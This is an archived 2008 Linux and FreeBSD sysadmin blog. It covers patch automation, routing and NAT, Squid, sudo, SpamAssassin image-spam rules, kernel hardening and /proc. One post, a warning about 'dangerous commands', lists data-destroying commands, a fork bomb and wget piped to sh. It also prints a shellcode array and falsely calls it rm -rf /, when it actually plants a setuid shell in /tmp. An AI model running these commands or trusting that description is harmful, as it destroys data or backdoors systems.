Monday, December 22, 2008

ClamAV

Clam AntiVirus is a free and open source anti-virus toolkit designed especially for e-mail scanning on mail gateways. It provides a number of utilities, including a flexible and scalable multi-threaded daemon, a command-line scanner and an advanced tool for automatic database updates. The core of the package is an anti-virus engine available in the form of a shared library. Both ClamAV and its updates are made available free of charge.

Tuesday, December 16, 2008

FreeBSD:Automate Security Patches

Keep up-to-date with security patches.

We all know that keeping up-to-date with security patches is important. The trick is coming up with a workable plan that ensures you're aware of new patches as they're released, as well as the steps required to apply those patches correctly.

Michael Vince created quickpatch to assist in this process. It allows you to automate the portions of the patching process you'd like to automate and manually perform the steps you prefer to do yourself.

Preparing the Script
quickpatch requires a few dependencies: perl, cvsup, and wget. Use which to determine if you already have these installed on your system:

% which perl cvsup wget

/usr/bin/perl

/usr/local/bin/cvsup

wget: Command not found.


Install any missing dependencies via the appropriate port (/usr/ports/lang/perl5, /usr/ports/net/cvsup-without-gui, and /usr/ports/ftp/wget, respectively).
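The which check above can be wrapped in a small loop that reports everything missing in one pass; a sketch (the tool list mirrors the dependencies named above):

```shell
#!/bin/sh
# Report which of quickpatch's dependencies are present.
missing=""
for tool in perl cvsup wget; do
    if command -v "$tool" >/dev/null 2>&1; then
        echo "found: $tool"
    else
        echo "MISSING: $tool (install it from the port listed above)"
        missing="$missing $tool"
    fi
done
if [ -z "$missing" ]; then
    echo "all dependencies present"
else
    echo "still needed:$missing"
fi
```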

Once you have the dependencies, download the script from http://roq.com/projects/quickpatch and untar it:

% tar xzvf quickpatch.tar.gz


This will produce an executable Perl script named quickpatch.pl. Open this script in your favorite editor and review the first two screens of comments, up to the #Stuff you probably don't want to change line.

Make sure that the $release line matches the tag you're using in your cvs-supfile [Hack #80] :

# The release plus security patches branch for FreeBSD that you are

# following in cvsup.

# It should always be along the lines of RELENG_X_X, for example RELENG_7_1

$release='RELENG_7_1';


The next few paths are fine as they are, unless you have a particular reason to change them:

# Ftp server mirror from where to fetch FreeBSD security advisories

$ftpserver="ftp.freebsd.org";

# Path to store patcher program files

$patchdir="/usr/src/";

# Path to store FreeBSD security advisories

$advdir="/var/db/advisories/";

$advdirtmp="$advdir"."tmp/";


If you're planning on applying the patches manually and, when required, rebuilding your kernel yourself, leave the next section as is. If you're brave enough to automate the whole works, make sure that the following paths accurately reflect your kernel configuration file and build directories:

# Path to your kernel rebuild script for source patches that require kernel

#rebuild

$kernelbuild="/usr/src/buildkernel";

#$kernelbuild="cd /usr/src ; make buildkernel KERNCONF=GENERIC && make

#installkernel KERNCONF=GENERIC ; reboot";

# Path to your system recompile script for patches that require full

# operating system recompile

$buildworld="/usr/src/buildworld";

#$buildworld="cd /usr/src/ ; make buildworld && make installworld ; reboot";

#Run patch command after creation, default no

$runpatchfile="0";

# Minimum advisory age in hours. This is to make sure you don't patch

# before your local cvsup server has had a

# chance to receive the source change update to your branch, in hours

$advisory_age="24";


Review the email accounts so the appropriate account receives notifications:

# Notify email accounts, eg: qw(billg@microsoft.com root@localhost);

@emails = qw(root);


Running the Hack
Run the script without any arguments to see the available options:

# ./quickpatch.pl

# Directory /var/db/advisories/ does not exist, creating

# Directory /var/db/advisories/tmp/ does not exist, creating

Quickpatch - Easy source based security update system

"./quickpatch.pl updateadv" to download / update advisories db

"./quickpatch.pl patch" or "./quickpatch.pl patch > big_patch_file" to

create patch files

"./quickpatch.pl notify" does not do anything but email you commands of what

it would do

"./quickpatch.pl pgpcheck" to PGP check advisories


Before applying any patches, quickpatch needs to know which patches exist. Start by downloading the advisories:

# ./quickpatch.pl updateadv


This will connect to ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories and download all of the advisories to /var/db/advisories. The first time you use this command, it will take a while. However, once you have a copy of the advisories, it takes only a second or so to compare your copies with the FTP site and, if necessary, download any new advisories.

After downloading the advisories, see if your system needs patching:

# ./quickpatch.pl notify

#


If the system is fully patched, you'll receive your prompt back. However, if the system is behind in patches, you'll see output similar to this:

# ./quickpatch.pl notify

######################################################################

####### FreeBSD-SA-04%3A02.shmat.asc

####### Stored in file /var/db/advisories/tmp/FreeBSD-SA-04%3A02.shmat

####### Topic: shmat reference counting bug

####### Hostname: genisis - 20/2/2004 11:57:30

####### Date Corrected: 2004-02-04 18:01:10

####### Hours past since corrected: 382

####### Patch Commands

cd /usr/src

# patch < /path/to/patch

### c) Recompile your kernel as described in

and reboot the

system.

/usr/src/buildkernel

## Emailed root


It looks like this system needs to be patched against the "shmat reference counting bug." While running in notify mode, quickpatch emails this information to the configured address but neither creates nor installs the patch.

To create the patch, use:

# ./quickpatch.pl patch

#########################################################

####### FreeBSD-SA-04%3A02.shmat.asc

####### Stored in file /usr/src/FreeBSD-SA-04%3A02.shmat

####### Topic: shmat reference counting bug

####### Hostname: genisis - 21/2/2004 10:41:54

####### Date Corrected: 2004-02-04 18:01:10

####### Hours past since corrected: 405

####### Patch Commands

cd /usr/src

# patch < /path/to/patch

### c) Recompile your kernel as described in

# and reboot the

#system.

/usr/src/buildkernel



# file /usr/src/FreeBSD-SA-04%3A02.shmat
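To close the loop on automation, the two non-destructive commands (updateadv and notify) can be run nightly from cron. A sketch, assuming the script lives in /usr/local/bin (adjust the path to wherever you unpacked quickpatch.pl):

```
# /etc/crontab entries: refresh the advisory database, then mail root a report
0  3  *  *  *  root  /usr/local/bin/quickpatch.pl updateadv
30 3  *  *  *  root  /usr/local/bin/quickpatch.pl notify
```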

Thursday, December 11, 2008

The 7 most dangerous commands of GNU/Linux

1. rm -rf /
This powerful command recursively deletes every file under the root directory "/".

2. Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

This is the hex version of rm -rf / and can deceive even experienced users of GNU/Linux.

3. mkfs.ext3 /dev/sda

This reformats the device named after the mkfs command, destroying all files on it.

4. :(){:|:&};:

Known as forkbomb, this command to run a large number of processes until the system freezes. This can lead to data corruption.

5. any_command > /dev/sda

This command writes raw output directly to the device, causing total loss of data on it.

6. wget http://some_untrusted_source -O - | sh

Never download from an untrusted source and pipe the result into a shell; it may be malicious code.

7. mv /home/yourhomedirectory/* /dev/null

This command moves all the files in your home directory to a place that does not exist; you will never see your files again.

If you got any other dangerous command, please let me know, I will include it over here.

[Ref: http://www.linuxpromagazine.com/online/news/seven_deadliest_linux_commands?category=13447]

Monday, December 8, 2008

Configure Routing , NAT and Gateway in Linux

A router is a device that directs network traffic destined for a different network in the right direction. For example, suppose your network uses the IP address range 192.168.1.0/24 and you also have a different network with addresses in the range 192.168.2.0/24. Note that these are 'Class C' network addresses. For a computer on the 192.168.1.0/24 network to communicate directly with a computer on the 192.168.2.0/24 network, you need an intermediary to direct the traffic to the destination network. This is achieved by a router.

Configuring Linux as a router
Linux can be effectively configured to act as a router between two networks. To activate routing functionality , you enable IP forwarding in Linux. This is how you do this:

# echo "1" > /proc/sys/net/ipv4/ip_forward

This enables IP forwarding immediately. To make the change persistent across reboots, edit the file /etc/sysctl.conf and enter the following line:

# vi /etc/sysctl.conf

net.ipv4.ip_forward = 1


Optionally, after editing the above file, you may execute the command :
# sysctl -p

Note: For your Linux machine to act as a router, you need two Ethernet cards in the machine, or you can configure a single Ethernet card with multiple IP addresses.

What is a gateway?
Any device which acts as the path from your network to another network or the internet is considered a gateway. Let me explain this with an example: suppose your computer, machine_B, has the address 192.168.0.5 with the default netmask, and another computer in your network, machine_A, with the IP address 192.168.0.1, is connected to the internet using a USB cable modem. Now, if you want machine_B to send or receive data destined for an outside network, a.k.a. the internet, it has to direct the traffic to machine_A first, which forwards it to the internet. So machine_A acts as the gateway to the internet. Each machine needs a default gateway to reach machines outside the local network. You can set the gateway on machine_B to point to machine_A as follows:
# route add default gw machine_A

Or if DNS is not configured…

# route add default gw 192.168.0.1

Now you can check if the default gateway is set on machine_B as follows:

# route -n

Note: Additional routes can be set using route command. To make the changes persistent across reboots, you may edit the /etc/sysconfig/static-routes file to show the configured route.

What is NAT ?
Network Address Translation (NAT) is a capability of the Linux kernel whereby the source or destination address/port of a packet is altered while in transit.

This is used in situations where multiple machines need to access the internet with only one official IP address available. A common name for this is IP masquerading. With masquerading, your router acts as an OSI layer 3 or layer 4 proxy. In this case, Linux keeps track of each packet's journey so that during transmission and receipt of data the content of the session remains intact. You can easily implement NAT on your gateway machine or router by using iptables, which I will explain in another post.
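As a quick preview of the iptables approach, masquerading takes only a couple of commands. This is a minimal sketch, assuming eth0 is the interface facing the internet (substitute your own external interface):

```shell
# Turn the box into a router, then rewrite the source address of
# outgoing packets to eth0's address (IP masquerading).
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
```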

Wednesday, December 3, 2008

Linux: Setup a transparent proxy with Squid 2.6 in three easy steps

Server Configuration
Step #1 : Squid configuration so that it will act as a transparent proxy
Step #2 : Iptables configuration
a) Configure system as router
b) Forward all http requests to 3128 (DNAT)
Step #3: Run scripts and start squid service
First, install the Squid server (use up2date squid) and configure it by adding the following directives to the file:
# vi /etc/squid/squid.conf
Modify or add following squid directives:
httpd_accel_host virtual
httpd_accel_port 80
httpd_accel_with_proxy on
httpd_accel_uses_host_header on
acl lan src 192.168.1.1 192.168.2.0/24
http_access allow localhost
http_access allow lan
Where,

httpd_accel_host virtual: run Squid as an httpd accelerator
httpd_accel_port 80: 80 is the port you want Squid to accelerate
httpd_accel_with_proxy on: Squid acts as both a local httpd accelerator and a proxy.
httpd_accel_uses_host_header on: use the Host header, which carries the hostname from the URL.
acl lan src 192.168.1.1 192.168.2.0/24: access control list; only allow LAN computers to use Squid
http_access allow localhost: allow localhost to access Squid
http_access allow lan: allow the lan ACL to access Squid

Iptables configuration
Next, add the following rules to forward all http requests (coming to port 80) to the Squid server port 3128:
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j DNAT --to 192.168.1.1:3128
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 3128
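Putting the three steps together, a minimal gateway-side script might look like the following. This is a sketch built from the rules above; eth0/eth1 and the 192.168.1.1 address are carried over from that configuration, and service squid start assumes a Red Hat-style init (start Squid however your distribution does it):

```shell
#!/bin/sh
# Transparent proxy sketch: enable routing, then push port-80
# traffic into Squid on port 3128 (same rules as above).
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 \
    -j DNAT --to 192.168.1.1:3128
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 \
    -j REDIRECT --to-port 3128
service squid start
```

Run it once at boot (for example from /etc/rc.local) so the rules survive a restart.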

Tuesday, December 2, 2008

Configuring sudo and adding users to Wheel group

If a server needs to be administered by a number of people it is normally not a good idea for them all to use the root account. This is because it becomes difficult to determine exactly who did what, when and where if everyone logs in with the same credentials. The sudo utility was designed to overcome this difficulty.

With sudo (which stands for "superuser do"), you can delegate a limited set of administrative responsibilities to other users, who are strictly limited to the commands you allow them. sudo creates a thorough audit trail, so everything users do gets logged; if users somehow manage to do something they shouldn't have, you'll be able to detect it and apply the needed fixes. You can even configure sudo centrally, so its permissions apply to several hosts.

To run a privileged command, begin it with the word sudo followed by the command's regular syntax. When running a command with the sudo prefix, you will be prompted for your regular password before it is executed. You may then run other privileged commands with sudo within a five-minute period without being re-prompted for a password. All commands run via sudo are logged in the log file /var/log/messages.


The sudo configuration file is /etc/sudoers. Never edit this file directly. Instead, use the visudo command: # visudo

This protects against conflicts (when two admins edit the file at the same time) and guarantees that the right syntax is used. The program uses the vi text editor.

All Access to Specific Users
You can grant users user1 and user2 full access to all privileged commands with this sudoers entry:
user1, user2 ALL=(ALL) ALL
This is generally not a good idea because this allows user1 and user2 to use the su command to grant themselves permanent root privileges thereby bypassing the command logging features of sudo.

Access To Specific Users To Specific Files
This entry allows user1 and all the members of the group operator to gain access to all the program files in the /sbin and /usr/sbin directories, plus the privilege of running the command /usr/apps/check.pl.
user1, %operator ALL= /sbin/, /usr/sbin, /usr/apps/check.pl

Access to Specific Files as Another User
This entry allows user1 to run the listed kill commands as the user accounts (invoked as, for example, sudo -u accounts /usr/bin/pkill <process>):
user1 ALL=(accounts) /bin/kill, /usr/bin/kill, /usr/bin/pkill

Access Without Needing Passwords
This example allows all users in the group operator to execute all the commands in the /sbin directory without the need for entering a password.
%operator ALL= NOPASSWD: /sbin/

Adding users to the wheel group
The wheel group is a legacy from UNIX. When a server had to be maintained at a higher level than the day-to-day system administrator, root rights were often required. The 'wheel' group was used to create a pool of user accounts that were allowed to get that level of access to the server. If you weren't in the 'wheel' group, you were denied access to root.

Edit the configuration file (/etc/sudoers) with visudo and change these lines:
# Uncomment to allow people in group wheel to run all commands
# %wheel ALL=(ALL) ALL

To this (as recommended):

# Uncomment to allow people in group wheel to run all commands
%wheel ALL=(ALL) ALL

This will allow anyone in the wheel group to execute commands using sudo (rather than having to add each person one by one).

Finally, use the following command to add a user (e.g., user1) to the wheel group:
# usermod -aG wheel user1
(The -a flag appends wheel to the user's existing secondary groups instead of replacing them; wheel is GID 10 on most systems.)

Sunday, November 23, 2008

Read-only domain controller support

Windows Server 2008 introduces a new type of domain controller, the read-only domain controller (RODC). An RODC provides, in effect, a shadow copy of a domain controller that cannot be directly configured, which makes it less vulnerable to attack. You can install an RODC in locations where physical security for the domain controller cannot be guaranteed.
To support RODCs, a DNS server running Windows Server 2008 supports a new type of zone, the primary read-only zone (also sometimes referred to as a branch office zone). When a computer becomes an RODC, it replicates a full read-only copy of all of the application directory partitions that DNS uses, including the domain partition, ForestDNSZones and DomainDNSZones. This ensures that the DNS server running on the RODC has a full read-only copy of any DNS zones stored on a centrally located domain controller in those directory partitions. The administrator of an RODC can view the contents of a primary read-only zone; however, the administrator can change the contents only by changing the zone on the centrally located domain controller.


Why is this functionality important?
AD DS relies on DNS to provide name-resolution services to network clients. The changes to the DNS Server service are required to support AD DS on an RODC.

Sunday, November 16, 2008

Physical Memory Supported for RHEL

RHEL3 Limitations
- x86 - 64 GB
- x86_64 - 64 GB
- ia64 - 128 GB

RHEL4 Limitations
- x86 - 64 GB
- x86_64 - 128 GB
- ia64 - 1 TB

RHEL5 Limitations
- x86 - 64 GB
- x86_64 - 256 GB
- ia64 - 2 TB

Tuesday, November 11, 2008

Curbing Image/PDF spam : SpamAssassin

A lot of spam images/PDFs were slipping through my office MXs since this spamming technique gained popularity, and it was getting really out of hand. I decided to put an end to this madness and experimented with various tactics to curb image/PDF spam. Generally, this can be achieved with spam scoring from SpamAssassin, or with ClamAV via Sanesecurity's Phishing and Scam Signatures for ClamAV.

On this post, I will share some of the tactics that I have tried with SpamAssassin. With SpamAssassin, fighting image/PDF spam was trivial.

SpamAssassin rules

A) Built-in ruleset

TVD_PDF_FINGER01, which matches the standard PDF-spam fingerprint (emails that have empty bodies but contain PDF attachments), was added by the SpamAssassin developers. It works well, adding a 1.0 score to PDF spam. However, that is too low to effectively catch PDF spam, as the threshold for tagging spam commonly stands at 5.0 - 10.0. Increasing the score is a bad idea, since a lot of lazy users regularly send PDF attachments with empty mail bodies, and this could lead to false positives.

B) Custom rulesets

Credit for this one goes to Ditesh, who wanted to further tighten his server by blocking attachments from strangers. I would suggest using this ruleset with a higher score instead (blocking is not a good idea). The ruleset was posted by Eric A. Hall on the SpamAssassin-users list recently. It uses the AWL to determine whether the sender of a binary attachment is a stranger (image/PDF spammers, of course, are strangers to you ;-)). As MIMEHeader is included by default in the SpamAssassin 3.2.x series, you can just add the ruleset to your local.cf.

ifplugin Mail::SpamAssassin::Plugin::MIMEHeader
mimeheader __L_C_TYPE_APP Content-Type =~ /^application/i
mimeheader __L_C_TYPE_IMAGE Content-Type =~ /^image/i
mimeheader __L_C_TYPE_AUDIO Content-Type =~ /^audio/i
mimeheader __L_C_TYPE_VIDEO Content-Type =~ /^video/i
mimeheader __L_C_TYPE_MODEL Content-Type =~ /^model/i
meta L_STRANGER_APP (!AWL && __L_C_TYPE_APP)
score L_STRANGER_APP 1.0
tflags L_STRANGER_APP noautolearn
priority L_STRANGER_APP 1001 # defer till after AWL
describe L_STRANGER_APP Application file sent by a stranger
meta L_STRANGER_IMAGE (!AWL && __L_C_TYPE_IMAGE)
score L_STRANGER_IMAGE 1.0
tflags L_STRANGER_IMAGE noautolearn
priority L_STRANGER_IMAGE 1001 # defer till after AWL
describe L_STRANGER_IMAGE Image file sent by a stranger
meta L_STRANGER_AUDIO (!AWL && __L_C_TYPE_AUDIO)
score L_STRANGER_AUDIO 1.0
tflags L_STRANGER_AUDIO noautolearn
priority L_STRANGER_AUDIO 1001 # defer till after AWL
describe L_STRANGER_AUDIO Audio file sent by a stranger
meta L_STRANGER_VIDEO (!AWL && __L_C_TYPE_VIDEO)
score L_STRANGER_VIDEO 1.0
tflags L_STRANGER_VIDEO noautolearn
priority L_STRANGER_VIDEO 1001 # defer till after AWL
describe L_STRANGER_VIDEO Video file sent by a stranger
meta L_STRANGER_MODEL (!AWL && __L_C_TYPE_MODEL)
score L_STRANGER_MODEL 1.0
tflags L_STRANGER_MODEL noautolearn
priority L_STRANGER_MODEL 1001 # defer till after AWL
describe L_STRANGER_MODEL Model file sent by a stranger
endif

PDFInfo

Grab PDFInfo.pm and pdfinfo.cf from the PDFInfo plugin site. Place pdfinfo.cf in SpamAssassin's configuration directory (/usr/local/etc/mail/spamassassin/) and PDFInfo.pm in the SpamAssassin plugin directory (/usr/local/lib/perl5/site_perl/5.8.8/Mail/SpamAssassin/Plugin/). To load the plugin, add loadplugin Mail::SpamAssassin::Plugin::PDFInfo to init.pre (or v310.pre). Alternatively, use loadplugin Mail::SpamAssassin::Plugin::PDFInfo /path/to/your/plugin if you placed PDFInfo.pm in a directory other than the SpamAssassin plugin directory. With that in place, restart SpamAssassin and verify that the PDFInfo plugin loads properly using SpamAssassin's debug output:

spamassassin --lint -D

You should see lines similar to these:

[32487] dbg: config: read file /usr/local/etc/mail/spamassassin/pdfinfo.cf
[32487] dbg: plugin: loading Mail::SpamAssassin::Plugin::PDFInfo from @INC

FuzzyOcr

I've installed the FuzzyOcr plugin from the FreeBSD ports (/usr/ports/mail/p5-FuzzyOcr-devel/). The FuzzyOcr development version is recommended, as the stable release is far too old, and it's easy to maintain. Manual installation is also relatively easy, as the tarball contains the FuzzyOcr Perl plugin module, configuration files and some sample image/PDF test mails. Just copy FuzzyOcr.cf and FuzzyOcr.words to SpamAssassin's configuration directory (if you installed from ports, the sample configuration is located in /usr/local/share/examples/FuzzyOcr/). I created a directory in /var/db called "fuzzyocr" for the FuzzyOcr databases and word list. My configuration file looks like this:

focr_enable_image_hashing 2
focr_global_wordlist /var/db/fuzzyocr/FuzzyOcr.words
focr_scansets $gocr -i $pfile, $gocr -l 180 -d 2 -i $pfile, $ocrad -s 0.5 -T 0.5 $pfile
focr_digest_db /var/db/fuzzyocr/FuzzyOcr.hashdb
focr_db_hash /var/db/fuzzyocr/FuzzyOcr.db
focr_db_safe /var/db/fuzzyocr/FuzzyOcr.safe.db
focr_hashing_learn_scanned 1

Again, verify that the plugin is loaded properly in SpamAssassin.
Other tactics

There are other tactics for fighting image/PDF spam which I have not tried. Those I'm aware of at the time of writing are PDFText and the Botnet plugin with a patch.
CONCLUSIONS

There has been a lot of discussion and experience sharing on the SpamAssassin-users and Maia-users lists. One notable post (titled "[Maia-users] PDF spam solutions") by Robert LeBlanc on the Maia-users list is comprehensive enough to give you an edge in fighting image/PDF spam. Nevertheless, new spam tactics evolve day by day. Who knows, we might be seeing MS Word / PowerPoint spam soon.

Sunday, November 9, 2008

A first look at Internet Information Services 7.0

While Microsoft Internet Information Services 6.0 (IIS) was already a very good Web server, the product now has a number of improvements with IIS 7.0. Some of these enhancements are related to security and server management, while others are geared toward Web developers. Let's take a look at some of the new features that matter most to network administrators.

Improved management tools

It may seem trivial, but my favorite improvement has got to be the new management tools. If you look at Figure A, you can see that the user interface has been completely redesigned from scratch. One of Microsoft's reasons for doing this was to create a management interface that allows you to manage Internet Information Services and ASP.NET through a single console.

As with most things in Windows Server 2008, IIS 7.0 has been tied into Windows PowerShell, which means you can perform various management tasks from the command line or through a PowerShell script. Microsoft has also created a new command line tool named APPCMD.EXE that helps automate common management tasks. In doing so, Microsoft has done away with the IIS 6.0-style administration scripts.

Improved troubleshooting

If you have ever tried to troubleshoot a problem with Internet Information Services 6.0, then you know that the troubleshooting process can be difficult, to say the least. Fortunately, Microsoft has finally taken some steps to make the troubleshooting process easier. The log file entries that IIS 7.0 produces are much more detailed than those created by IIS 6.0, and they include more status codes. These improvements should help administrators troubleshoot problems much faster.

Compartmentalized installation

One of the things about Internet Information Services that always bugged me was that it always seemed a bit bloated. Sure, Windows Server 2003 allows you to pick which IIS components you want to install, but many of these components are made of sub-components that cannot be disabled. Granted, IIS isn't that large of an application, but there is something to be said for reducing the potential attack surface of a Web server.

With Internet Information Services 7.0, Microsoft broke down IIS into dozens of modular components, each of which can be individually enabled or disabled. In Figure B, you can see just how granular the installation process has become.

SSL-encrypted FTP

Although IIS has supported Secure Sockets Layer (SSL) encryption for websites for many years now, for some reason, Microsoft never offered the ability to encrypt FTP traffic. In Internet Information Services 7.0, the company has completely rewritten its FTP server module to bring it up to date. Not only does it now support SSL encryption, but it also makes it easy to create FTP publishing points for Web applications, using either an independent authentication method or authentication via Microsoft Active Directory.

One thing I want to mention about the new FTP publishing service is that it is not actually included with Internet Information Services 7.0 -- although it is considered to be an officially supported IIS 7.0 feature. You can download the FTP publishing service here.

Delegated administration

Another cool new feature is something called delegated administration. The basic idea behind this feature is to make a single IIS server capable of hosting multiple websites. In the past, if admins could administer one website, they could manage every site hosted by the server. Internet Information Services 7.0 allows you to perform delegations so that administrators are limited to managing only specific websites or even individual parts of a website.

Remote administration

Traditionally, if an administrator wanted to manage Internet Information Services, then the tool of choice was usually the IIS Manager console. However, IIS 7.0 contains a new remote management tool called Web Management Services (WMSVC) that you can use to manage the server over the Web by using HTTPS. It is important to keep in mind that Web Management Services is not installed by default. You can find detailed instructions for installing this new component here.

All of these improvements go a long way toward making Internet Information Services 7.0 a lot more secure and easier to manage than IIS 6.0.

Wednesday, November 5, 2008

Quick Guide to compress / decompress files

tar (tar)
Pack
tar cvf archive.tar /path/to/files
Unpack
tar xvf archive.tar
View the contents (without extracting)
tar tvf archive.tar
tar.gz - tar.Z - tgz (tar with gzip)
Pack and compress
tar czvf archive.tar.gz /path/to/files
Unpack and decompress
tar xzvf archive.tar.gz
View the contents (without extracting)
tar tzvf archive.tar.gz
gz (gzip)
Compress
gzip file
(compresses "file" and renames it "file.gz")
Decompress
gzip -d file.gz
(decompresses "file.gz" and leaves it as "file")
Note: gzip compresses only files, not directories
bz2 (bzip2)
Compress
bzip2 file
(compresses "file" and renames it "file.bz2")
Decompress
bzip2 -d file.bz2
bunzip2 file.bz2
(decompresses "file.bz2" and leaves it as "file")
Note: bzip2 compresses only files, not directories
tar.bz2 (tar with bzip2)
Compress
tar -c files | bzip2 > archive.tar.bz2
Decompress
bzip2 -dc archive.tar.bz2 | tar -xv
tar xjvf archive.tar.bz2 (recent versions of tar)
View the contents
bzip2 -dc archive.tar.bz2 | tar -tv
zip (zip)
Compress
zip archive.zip /path/to/files
Decompress
unzip archive.zip
View the contents
unzip -v archive.zip
rar (rar)
Compress
rar a archive.rar /path/to/files
Decompress
rar x archive.rar
View the contents
rar v archive.rar
rar l archive.rar

Sunday, November 2, 2008

Ubuntu…8.04 LTS Server

Take a look at the LTS version of the server. When it was released, it did not have LVM2, it did not have all of the updated software RAID tools, and it did not have ACLs installed either. Each of these is a standard option that any administrator would want available, especially in the LTS version. They could be installed manually once you had installed 8.04, and they were later added via the update process. The point is, Ubuntu should have released a solid, up-to-date server version in 8.04, not a build-as-you-go with updates. Administrators depend on their servers being up to speed when they install. In addition, adding LVM2, RAID tools and ACLs after the installation is problematic.

Wednesday, October 29, 2008

How do I force users to change their passwords upon first login?

1.) Firstly, lock the account to prevent the user from using the login until the change has been made:

# usermod -L <username>

2.) Change the password expiration date to 0 to ensure the user changes the password during the next login:

# chage -d 0 <username>

3.) To unlock the account after the change do the following:

# usermod -U <username>
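The three steps above can be combined into one small script. A sketch; alice is a placeholder username, the commands must run as root, and passing echo as the second argument previews the commands instead of running them:

```shell
#!/bin/sh
# Force a user to change their password at next login.
force_password_change() {
    user="$1"
    runner="${2:-}"               # pass "echo" for a dry run
    $runner usermod -L "$user"    # 1) lock the account
    $runner chage -d 0 "$user"    # 2) expire the password immediately
    $runner usermod -U "$user"    # 3) unlock; a new password is demanded at login
}

# dry run: prints the three commands instead of executing them
force_password_change alice echo
```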


Wednesday, October 22, 2008

Kernel parameters for enhance security

The following list shows tunable kernel parameters you can use to secure your Linux server against attacks.

For each tunable kernel parameter, add it to the /etc/sysctl.conf configuration file to make the change permanent across reboots. To activate the configured kernel parameters immediately at runtime, use:
# sysctl -p

Enable TCP SYN Cookie Protection

A "SYN Attack" is a denial of service attack that consumes all the resources on a machine. Any server that is connected to a network is potentially subject to this attack.

To enable TCP SYN Cookie Protection, edit the /etc/sysctl.conf file and add the following line:
net.ipv4.tcp_syncookies = 1

Disable IP Source Routing

Source Routing is used to specify a path or route through the network from source to destination. This feature can be used by network people for diagnosing problems. However, if an intruder was able to send a source routed packet into the network, then he could intercept the replies and your server might not know that it's not communicating with a trusted server.

To enable Source Route Verification, edit the /etc/sysctl.conf file and add the following line:
net.ipv4.conf.all.accept_source_route = 0

Disable ICMP Redirect Acceptance

ICMP redirects are used by routers to tell the server that there is a better path to other networks than the one chosen by the server. However, an intruder could potentially use ICMP redirect packets to alter the host's routing table by causing traffic to use a path you didn't intend.

To disable ICMP Redirect Acceptance, edit the /etc/sysctl.conf file and add the following line:
net.ipv4.conf.all.accept_redirects = 0

Enable IP Spoofing Protection

IP spoofing is a technique where an intruder sends out packets which claim to be from another host by manipulating the source address. IP spoofing is very often used for denial of service attacks. For more information on IP Spoofing, I recommend the article IP Spoofing: Understanding the basics.

To enable IP Spoofing Protection, turn on Source Address Verification. Edit the /etc/sysctl.conf file and add the following line:
net.ipv4.conf.all.rp_filter = 1

Enable Ignoring ICMP Echo Requests

If you want or need Linux to ignore ping requests, edit the /etc/sysctl.conf file and add the following line:
net.ipv4.icmp_echo_ignore_all = 1
This may not be acceptable in many environments.

Enable Ignoring Broadcast Requests

If you want or need Linux to ignore broadcast requests, edit the /etc/sysctl.conf file and add the following line:
net.ipv4.icmp_echo_ignore_broadcasts = 1

Enable Bad Error Message Protection

To ignore bogus ICMP error messages and keep them from cluttering your logs, edit the /etc/sysctl.conf file and add the following line:
net.ipv4.icmp_ignore_bogus_error_responses = 1

Enable Logging of Spoofed Packets, Source Routed Packets, Redirect Packets

To turn on logging for Spoofed Packets, Source Routed Packets, and Redirect Packets, edit the /etc/sysctl.conf file and add the following line:
net.ipv4.conf.all.log_martians = 1
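Collected in one place, the /etc/sysctl.conf fragment containing every setting from this list looks like this (activate it with sysctl -p):

```
# Kernel hardening settings from this post
net.ipv4.tcp_syncookies = 1
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.all.rp_filter = 1
net.ipv4.icmp_echo_ignore_all = 1
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.icmp_ignore_bogus_error_responses = 1
net.ipv4.conf.all.log_martians = 1
```

Remember that icmp_echo_ignore_all may not be acceptable in many environments; drop that line if your hosts must answer pings.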

Thursday, October 16, 2008

/proc explained

This filesystem (/proc) contains a huge set of numbered directories that come and go. Each of these numbered directories holds information about one of the currently active processes on the machine. When a new process starts, a directory is created for it in the /proc filesystem, containing data about the process such as the command line with which the program was started, a link to its current working directory, its environment variables, the location of its executable, and so on.

Most of the files are fairly "human readable", but a few of them are not, and a few you should not touch at all, such as the kcore file. The kcore file contains debugging information regarding the kernel; if you try to 'cat' it, your system may very well hang up and die, and if you try to copy it to a real file on the hard drive, you will very soon fill up your whole partition. What all of this tells you is to be careful. Most of the entries in the /proc filesystem are harmless to look at, but a few of them are not. A brief walkthrough of the most important files:
  • cmdline - The command line issued when starting the kernel.
  • cpuinfo - Information about the Central Processing Unit, who made it, known bugs, flags etcetera.
  • dma - Contains information about all DMA channels available, and which driver is using it.
  • filesystems - Contains short information about every single filesystem that the kernel supports.
  • interrupts - Gives you a brief listing of all IRQ channels, how many interrupts they have seen and which driver is actually using them.
  • iomem - A brief file containing all IO memory mappings used by different drivers.
  • ioports - Contains a brief listing of all IO ports used by different drivers.
  • kcore - Contains a complete memory dump. Do not cat or anything like that, you may freeze your system. Mainly used to debug the system.
  • kmsg - Contains messages sent by the kernel; it is not and should not be readable by ordinary users since it may contain vital information. Main usage is to debug the system.
  • ksyms - This contains the kernel symbol table, which is mainly used to debug the kernel.
  • loadavg - Gives the load average of the system during the last 1, 5 and 15 minutes.
  • meminfo - Contains information about memory usage on the system.
  • modules - Contains information about all currently loaded modules in the kernel.
  • mounts - Symlink to another file in the /proc filesystem which contains information about all mounted filesystems.
  • partitions - Contains information about all partitions found on all drives in the system.
  • pci - Gives tons of hardware information about all PCI devices on the system, also includes AGP devices and built in devices which are connected to the PCI bus.
  • swaps - Contains information about all swap partitions mounted.
